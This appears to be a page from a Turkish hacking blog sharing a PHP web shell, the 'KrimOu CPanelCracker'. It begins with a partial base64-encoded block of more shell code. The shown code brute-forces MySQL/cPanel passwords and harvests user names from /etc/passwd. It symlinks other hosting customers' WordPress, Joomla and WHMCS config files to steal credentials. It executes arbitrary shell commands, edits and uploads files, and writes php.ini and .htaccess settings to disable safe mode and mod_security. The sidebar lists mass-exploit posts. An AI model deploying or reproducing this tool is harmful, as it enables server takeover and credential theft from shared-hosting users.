b25nPjwvdGQ+DQoJCTwvdHI+DQoJCTx0cj4NCgkJCTx0ZCBjbGFzcz0ic3R5bGUxMyI+DQoJCQkJCTxmb3JtIG1ldGhvZD0icG9zdCI+DQoJCQkJCQk8c2VsZWN0IG5hbWU9ImF0dCIgZGlyPSJydGwiIHN0eWxlPSJoZWlnaHQ6IDEwOXB4IiBzaXplPSI2Ij4NCgknOw0KCWlmKCRfUE9TVFsnYXR0J109PW51bGwpDQoJew0KCWVjaG8gJwkJCQkJCTxvcHRpb24gdmFsdWU9InN5c3RlbSIgc2VsZWN0ZWQ9IiI+c3lzdGVtPC9vcHRpb24+JzsNCgl9ZWxzZXsNCgllY2hvICIJCQkJCQk8b3B0aW9uIHZhbHVlPSckX1BPU1RbYXR0XScgc2VsZWN0ZWQ9Jyc+JF9QT1NUW2F0dF08L29wdGlvbj4NCgkJCQkJCQk8b3B0aW9uIHZhbHVlPXN5c3RlbT5zeXN0ZW08L29wdGlvbj4NCgkiOw0KDQoJCQkJCQkJDQoJfQ0KDQoJZWNobyAnDQoJCQkJCQkJPG9wdGlvbiB2YWx1ZT0icGFzc3RocnUiPnBhc3N0aHJ1PC9vcHRpb24+DQoJCQkJCQkJPG9wdGlvbiB2YWx1ZT0iZXhlYyI+ZXhlYzwvb3B0aW9uPg0KCQkJCQkJCTxvcHRpb24gdmFsdWU9InNoZWxsX2V4ZWMiPnNoZWxsX2V4ZWM8L29wdGlvbj4JDQoJCQkJCQk8L3NlbGVjdD4NCgkJCQkJCQk8aW5wdXQgbmFtZT0icGFnZSIgdmFsdWU9ImNjbW1kZCIgdHlwZT0iaGlkZGVuIj48YnI+DQoJCQkJCQkJPGlucHV0IGRpcj0ibHRyIiBuYW1lPSJjY21tZGQyIiBzdHlsZT0id2lkdGg6IDE3M3B4IiB0eXBlPSJ0ZXh0IiB2YWx1ZT0iJztpZighJF9QT1NUWydjY21tZGQyJ10pe2VjaG8gJ2Rpcic7fWVsc2V7ZWNobyAkX1BPU1RbJ2NjbW1kZDInXTt9ZWNobyAnIj48YnI+DQoJCQkJCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9Ij8/Pz4NCgkJCQkJPC9mb3JtPg0KCQkJDQoJCQk8L3RkPg0KCQk8L3RyPg0KCQk8dHI+DQoJCQk8dGQgY2xhc3M9InN0eWxlMTMiPg0KCSc7DQoNCgkJCWlmKCRfUE9TVFthdHRdPT0nc3lzdGVtJykNCgkJCXsNCgllY2hvICcNCgkJCQkJCTx0ZXh0YXJlYSBkaXI9Imx0ciIgbmFtZT0iVGV4dEFyZWExIiBzdHlsZT0id2lkdGg6IDc0NXB4OyBoZWlnaHQ6IDIwNHB4Ij4nOw0KCQkJCQkJc3lzdGVtKCRfUE9TVFsnY2NtbWRkMiddKTsNCgllY2hvICcJCQkJCTwvdGV4dGFyZWE+JzsNCg0KDQoJCQl9DQoNCgkJCWlmKCRfUE9TVFthdHRdPT0ncGFzc3RocnUnKQ0KCQkJew0KCWVjaG8gJw0KCQkJCQkJPHRleHRhcmVhIGRpcj0ibHRyIiBuYW1lPSJUZXh0QXJlYTEiIHN0eWxlPSJ3aWR0aDogNzQ1cHg7IGhlaWdodDogMjA0cHgiPic7DQoJCQkJCQlwYXNzdGhydSgkX1BPU1RbJ2NjbW1kZDInXSk7DQoJZWNobyAnCQkJCQk8L3RleHRhcmVhPic7DQoNCg0KCQkJfQ0KDQoJCQkNCg0KDQoNCgkJCWlmKCRfUE9TVFthdHRdPT0nZXhlYycpDQoJCQl7DQoNCgllY2hvICcJCQkJCTx0ZXh0YXJlYSBkaXI9Imx0ciIgbmFtZT0iVGV4dEFyZWExIiBzdHlsZT0id2lkdGg6IDc0NXB4OyBoZWlnaHQ6IDIwNHB4Ij4nOw0KCQkJCQkJZXhlYygkX1BPU1RbJ2NjbW1kZDInXSwkcmVzKTsNCgkJCQkJZWNobyAkcmVzID0gam9pbigiXG4iLCRyZXMpOyAJCQkJDQoJZWNobyAnCQkJCQk8L3RleHRhcmVhPic7DQoNCg0KCQkJfQ0KDQoNCg0KDQoNCg0KDQoJCQlpZigkX1BPU1RbYXR0XT09J3NoZWxsX2V4ZWMnKQ0KCQkJew0KDQoJZWNobyAnCQkJCQk8dGV4dGFyZWEgZGlyPSJsdHIiIG5hbWU9IlRleHRBcmVhMSIgc3R5bGU9IndpZHRoOiA3NDVweDsgaGVpZ2h0OiAyMDRweCI+JzsNCgkJCQkJZWNobwlzaGVsbF9leGVjKCRfUE9TVFsnY2NtbWRkMiddKTsNCgllY2hvICcJCQkJCTwvdGV4dGFyZWE+JzsNCg0KDQoJCQl9DQoJZWNobyAnCQkNCgkJCTwvdGQ+DQoJCTwvdHI+DQoJPC90YWJsZT4NCgknOw0KDQoJZXhpdDsNCgl9DQoNCglpZigkX1BPU1RbJ3BhZ2UnXT09J2VkaXQnKQ0KCXsNCg0KCSRjb2RlPUBzdHJfcmVwbGFjZSgiXHJcbiIsIlxuIiwkX1BPU1RbJ2NvZGUnXSk7DQoJJGNvZGU9QHN0cl9yZXBsYWNlKCdcXCcsJycsJGNvZGUpOw0KCSRmcCA9IGZvcGVuKCRwYXRoY2xhc3MsICd3Jyk7DQoJZndyaXRlKCRmcCwiJGNvZGUiKTsNCglmY2xvc2UoJGZwKTsNCgllY2hvICI8Y2VudGVyPjxiPk9LIEVkaXQ8YnI+PGJyPjxicj48YnI+PGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI+QkFDSzwvYT4iOw0KCWV4aXQ7DQoJfQkNCg0KDQoNCg0KDQoNCg0KCQlpZigkX1BPU1RbJ3BhZ2UnXT09J3Nob3cnKQ0KCQl7DQoJCSRwYXRoY2xhc3MgPSRfUE9TVFsncGF0aGNsYXNzJ107DQoJZWNobyAnDQoJPGZvcm0gbWV0aG9kPSJQT1NUIj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYWdlIiB2YWx1ZT0iZWRpdCI+DQoJJzsNCgkJDQoJCSRzYWhhY2tlciA9IGZvcGVuKCRwYXRoY2xhc3MsICJyYiIpOw0KCWVjaG8gJzxjZW50ZXI+Jy4kcGF0aGNsYXNzLic8YnI+PHRleHRhcmVhIGRpcj0ibHRyIiBuYW1lPSJjb2RlIiBzdHlsZT0id2lkdGg6IDg0NXB4OyBoZWlnaHQ6IDQwNHB4Ij4nOwkNCgkkY29kZSA9IGZyZWFkKCRzYWhhY2tlciwgZmlsZXNpemUoJHBhdGhjbGFzcykpOw0KCWVjaG8gJGNvZGUgPWh0bWxzcGVjaWFsY2hhcnMoJGNvZGUpOw0KCWVjaG8gJzwvdGV4dGFyZWE+JzsJDQoJCWZjbG9zZSgkc2FoYWNrZXIpOw0KCWVjaG8gJw0KCTxicj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGF0aGNsYXNzIiB2YWx1ZT0iJy4kcGF0aGNsYXNzLiciIHN0eWxlPSJ3aWR0aDogNDQ1cHg7Ij4NCgk8YnI+PHN0cm9uZz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iZWRpdCBmaWxlIj4NCgk8L2Zvcm0+DQoJJzsNCgkJCWV4aXQ7DQoJCX0NCg0KDQoNCg0KCQlpZigkX1BPU1RbJ3BhZ2UnXT09J2NjbW1kZCcpDQoJCXsNCgkJZWNobyBjY21tZGQoJGNjbW1kZDIsJGF0dCk7DQoJCWV4aXQ7DQoJCX0NCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCglpZigkX1BPU1RbJ3BhZ2UnXT09J2ZpbmQnKQ0KCXsNCglpZihpc3NldCgkX1BPU1RbJ3VzZXJuYW1lcyddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3N3b3JkcyddKSkNCgl7DQoJCQlpZigkX1BPU1RbJ3R5cGUnXSA9PSAncGFzc3dkJyl7DQoJCQkJCSRlID0gZXhwbG9kZSgiXG4iLCRfUE9TVFsndXNlcm5hbWVzJ10pOw0KCQkJCQlmb3JlYWNoKCRlIGFzICR2YWx1ZSl7DQoJCQkJCSRrID0gZXhwbG9kZSgiOiIsJHZhbHVlKTsNCgkJCQkJJHVzZXJuYW1lIC49ICRrWycwJ10uIiAiOw0KCQkJCQl9DQoJCQl9ZWxzZWlmKCRfUE9TVFsndHlwZSddID09ICdzaW1wbGUnKXsNCgkJCQkJJHVzZXJuYW1lID0gc3RyX3JlcGxhY2UoIlxuIiwnICcsJF9QT1NUWyd1c2VybmFtZXMnXSk7DQoJCQl9DQoJCQkkYTEgPSBleHBsb2RlKCIgIiwkdXNlcm5hbWUpOw0KCQkJJGEyID0gZXhwbG9kZSgiXG4iLCRfUE9TVFsncGFzc3dvcmRzJ10pOw0KCQkJJGlkMiA9IGNvdW50KCRhMik7DQoJCQkkb2sgPSAwOw0KCQkJZm9yZWFjaCgkYTEgYXMgJHVzZXIgKQ0KCQkJew0KCQkJCQlpZigkdXNlciAhPT0gJycpDQoJCQkJCXsNCgkJCQkJJHVzZXI9dHJpbSgkdXNlcik7DQoJCQkJCSBmb3IoJGk9MDskaTw9JGlkMjskaSsrKQ0KCQkJCQkgew0KCQkJCQkJCSRwYXNzID0gdHJpbSgkYTJbJGldKTsNCgkJCQkJCQlpZihAbXlzcWxfY29ubmVjdCgnbG9jYWxob3N0JywkdXNlciwkcGFzcykpDQoJCQkJCQkJew0KCQkJCQkJCQkJZWNobyAiMTk2MkNyYWNrZXJ+IHVzZXIgaXMgPT0+ICg8Yj48Zm9udCBjb2xvcj1ncmVlbj4kdXNlcjwvZm9udD48L2I+KSBQYXNzd29yZCBpcyA9PT4gKDxiPjxmb250IGNvbG9yPXJlZD4kcGFzczwvZm9udD48L2I+KTxiciAvPiI7DQoJCQkJCQkJCQkkb2srKzsNCgkJCQkJCQl9DQoJCQkJCSB9DQoJCQkJCX0NCgkJCX0NCgkJCWVjaG8gIjxocj48Yj5Zb3UgRm91bmQgPGZvbnQgY29sb3I9Z3JlZW4+JG9rPC9mb250PiBjUGFuZWwgKDE5NjJDcmFja2VyKTwvYj4iOw0KCQkJZWNobyAiPGNlbnRlcj48Yj48YSBocmVmPSIuJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIj48fiBCQUNLPC9hPiI7DQoJCQlleGl0Ow0KCX0NCgl9DQo=")); ?>

<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >


<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
</font><br><font color=white>--==[[Greetz to]]==--</font><br><font color=#ff9933>-=| My Gril :3|=-<br>

</table>
</table> <div align=center><font color=#ff9933 font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%">

<span class="footerlink"> ####### Coded By KrimOu #######</span>

</marquee><br></font></div><div align=center><table width=50%>

 <form method="POST" target="_blank">
  <strong>
   <input name="page" type="hidden" value="find">            
   </strong>
   <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
   <tr>
     <td valign="top" bgcolor="#151515"><center><strong><img src="http://im58.gulfup.com/Ufq2FO.jpg" /><br>
   </strong>
   <a href="https://www.facebook.com/krimoudz07" class="style2"><strong>KrimOu CPanelCracker Script</strong></a></center></td>
   </tr>        
   <tr>
   <td>
   <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
   <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  <strong>User :</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
   </tr>
   <tr>
   <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  <strong>Pass :</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
   </tr>
   
   <tr>
   <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  <strong>Type :</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
   <span class="style2"><strong>Simple : </strong> </span>
  <strong>
  <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
   <font class="style2"><strong>/etc/passwd : </strong> </font>
  <strong>
  <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  </span>
   </td>
   </tr>
   <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"></td>
   <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">

   </td>
   <tr>
 </form>    
 
  <tr>
   <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Config Zone</strong></td>
       </tr>
    <tr>                               
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Get User & Config</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
  <strong>
<form method=post>
<input type=submit name="usre" value="Get Usernames & Config !" /></form>




<?php
if(isset($_POST['usre'])){
?><form method=post>
<textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}

?></textarea><br><br>
<input type=submit name=su value=" Get Configuration Files :)" /></form>
<?php } ?>
<?php
error_reporting(0);
echo "<font color=red size=2 face=\"comic sans ms\">";
if(isset($_POST['su']))
{

$dir=mkdir('dzmafia',0777);
$r = " Options all \n DirectoryIndex dz.html \n Require None \n Satisfy Any";
$f = fopen('dzmafia/.htaccess','w');

fwrite($f,$r);
$consym="<a href=dzmafia/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
echo "<br>folder where config files has been symlinked By The 1962 Script Coded By Akram Stelle (Dz Mafia Team)<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";

$usr=explode("\n",$_POST['user']);

foreach($usr as $uss )
{
$us=trim($uss);

$r="dzmafia/";
symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
}
}
?>       

    </tr> 

   <td valign="top" colspan="6"><strong></strong></td>

 <form method="POST" target="_blank">
 <strong>
 <input type="hidden" name="go" value="cmd_mysql">
    </strong>
    <tr>
   <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
       </tr>
    <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
   <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
   <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
   <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
   <td valign="top" bgcolor="#151515"><strong>database</strong></td>
   <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
       </tr>
      <tr>
   <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
  <strong>cmd ~</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
  <strong>
  <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
 SHOW TABLES user_vb ;
 SELECT * FROM user;
 SELECT version();
 SELECT user();</textarea></strong></td>
    </tr>
   <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
   <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
    </tr>
 <input name="db" value="MySQL" type="hidden">
 <input name="db_server" type="hidden" value="localhost">
 <input name="db_port" type="hidden" value="3306">
 <input name="cccc" type="hidden" value="db_query">
    
 </form>     
   <tr>
   <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>


   </tr>
   
 <form method="POST" target="_blank">
   <tr>
   <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD 
  system - passthru - exec - shell_exec</strong></td>
       </tr>
   <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
      <select name="att" dir="rtl"  size="1">
<?php
 if($_POST['att']==null)
 {
 echo '      <option value="system" selected="">system</option>';
 }else{
 echo "      <option value='$_POST[att]' selected=''>$_POST[att]</option>
       <option value=system>system</option>
 ";

       
 }
?>  

       <option value="passthru">passthru</option>
       <option value="exec">exec</option>
       <option value="shell_exec">shell_exec</option>
      </select>    
   <strong>
 <input name="page" type="hidden" value="ccmmdd">    
  <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
    </tr>
   <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
   <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Go"></strong></td>
    </tr>
 </form>          

 <form method="POST" target="_blank">

   <tr>
   <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show 
  File And Edit</strong></td>
       </tr>
   <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
  <strong>
  <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
    </tr>
   <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
   <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
       </tr>
 <input name="page" type="hidden" value="show">            
 </form>       

     <tr>
   <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Tools</strong></td>
       </tr>
    <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Upload</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
  <strong>
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
 if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUCSES :) !!!</b><br><br>'; }
 else { echo '<b>Upload Failed :( !!!</b><br><br>'; }
}
?>
     <tr>
   <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Server Info</strong></td>
       </tr>
    <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
  <strong>
 <?php
 $safe_mode = ini_get('safe_mode');
 if($safe_mode=='1')
 {
 echo 'ON';
 }else{
 echo 'OFF';
 }

 ?> 
  </strong> 
  </td>
       </tr>
       
          <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Uname</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
<?php
echo '<b><br>'.php_uname().'<br></b>';
?>
</tr>
</td> 
       
                <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Kill Safe Mode</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
<strong>

<?php
echo "<right>";
echo"<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
 <p align='center'>
 <INPUT type='submit' name='Kill' value='if Safe Mode is On Clic Here To Kill The SafeMode [ini.php] [php.ini] [.htaccess]' id=input style='font-size: 12pt; font-weight: bold; border-style: inset; border-width: 1px'></p>
</form>
";
echo "<right/>";
if  (empty($_POST['Kill'] ) ) {
 }ELSE{
 $action = '?action=Kill';
echo "<html>
<br>
<head>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";

$fp = fopen("php.ini","w+");
fwrite($fp,"safe_mode = Off
disable_functions  =    NONE
open_basedir = OFF ");
echo "<b>[SafeMode Done] .. :) This Script Is Coded By Akram Stelle (Dz Mafia Team)</b>";
echo ("<br>");

$fp2 = fopen(".htaccess","w+");
fwrite($fp2,"
<IfModule mod_security.c>
KillFilterEngine Off
KillFilterScanPOST Off
KillFilterCheckURLEncoding Off
KillFilterCheckUnicodeEncoding Off
</IfModule>
");


echo "<b>[Mod_Security Done]</b><br>";

    echo "<font><center></td></tr><table> ";

 }
?>

</strong> 
</tr>
</td>
<tr>

  <tr>
   <td valign="top" bgcolor="#151515" style="width: 139px"><strong>SerVer Search</strong></td>
   <td valign="top" bgcolor="#151515" colspan="5">
  <strong> 
<?php


echo " <center> </center>";
$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
echo "Server IP = <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])."
 </font>[</span>
 <a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing Search</a>][</span><a href='http://zone-h.com/archive/ip=".$serverIP."' target=\"_blank\">Zone-H Search</a>]<center>";
?>
</strong> 
</tr>
</td>  
        <tr>
   <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> KrimOu Expect Us</strong></td>
       </tr>

Devamını Oku..

KAPTANWHİTEHAT HOŞ GELDİNİZ! !

KAPTANWHİTEHAT Fame Store ile sende fame ol!!

KAPTANWHİTEHAT hackerlar'dan korunma yolları!

KAPTANWHİTEHAT programcı olmak istermisiniz

En Güncel Paylaşımlar KAPTANWHİTEHAT'da !

26 Mayıs 2015 Salı

Wordpress church_admin Stored XSS

Multiple vulnerabilities in WordPress plugin "NewStatPress"

SQLi vulnerabilities in WordPress plugin "GigPress"

25 Mayıs 2015 Pazartesi

Online Sql İNjectör

22 Mayıs 2015 Cuma

[PHP] WordPress 0day Add Admin MASS Exploiting

[PHP] Mass Revslider Exl0it1ng

[PHP] Cpanel Cracker 2015 Priv

Blog Arşivi

YÖNETİCİ

Tag

Blog Archive

İletişim Formu

DUYURU

ZİYARETCİ

26 Mayıs 2015 Salı

25 Mayıs 2015 Pazartesi

22 Mayıs 2015 Cuma

Social Profiles

Blog Arşivi

YÖNETİCİ

Tag

Blog Archive

İletişim Formu

DUYURU

ZİYARETCİ